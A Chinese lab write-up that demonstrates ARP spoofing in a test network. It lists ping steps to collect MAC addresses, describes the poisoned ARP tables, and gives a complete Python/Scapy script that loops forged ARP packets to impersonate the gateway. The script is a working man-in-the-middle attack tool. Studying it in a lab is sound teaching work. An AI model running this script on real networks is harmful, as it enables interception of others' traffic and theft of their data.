使用python实现arp欺骗
实验拓扑:1.首先进行ping测试网关和kali,来获取mac地址ping 192.168.72.131ping 192.168.72.20MAC地址对应结果如下:2.进行使用脚本中间人欺骗,脚本放在最后3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的macpython脚本:import sysimport timefrom scapy.all impor
·
实验拓扑:
1.首先进行ping测试网关和kali,来获取mac地址
ping 192.168.72.131
ping 192.168.72.20
MAC地址对应结果如下:
2.进行使用脚本中间人欺骗,脚本放在最后
3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac
python脚本:
import sys
import time
from scapy.all import sendp, ARP, Ether
if len(sys.argv) != 3:
print(sys.argv[0] + ":<target_IP> <spoof_ip>")
sys.exit()
victimIP = sys.argv[1] # 接收第二个参数:target_IP
gatewayIP = sys.argv[2]
packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP) # 封装一个二层的ARP包,进行欺骗
while True:
sendp(packet) # 发送包
time.sleep(3)
print(packet.show())

GitCode 天启AI是一款由 GitCode 团队打造的智能助手,基于先进的LLM(大语言模型)与多智能体 Agent 技术构建,致力于为用户提供高效、智能、多模态的创作与开发支持。它不仅支持自然语言对话,还具备处理文件、生成 PPT、撰写分析报告、开发 Web 应用等多项能力,真正做到“一句话,让 Al帮你完成复杂任务”。
更多推荐
所有评论(0)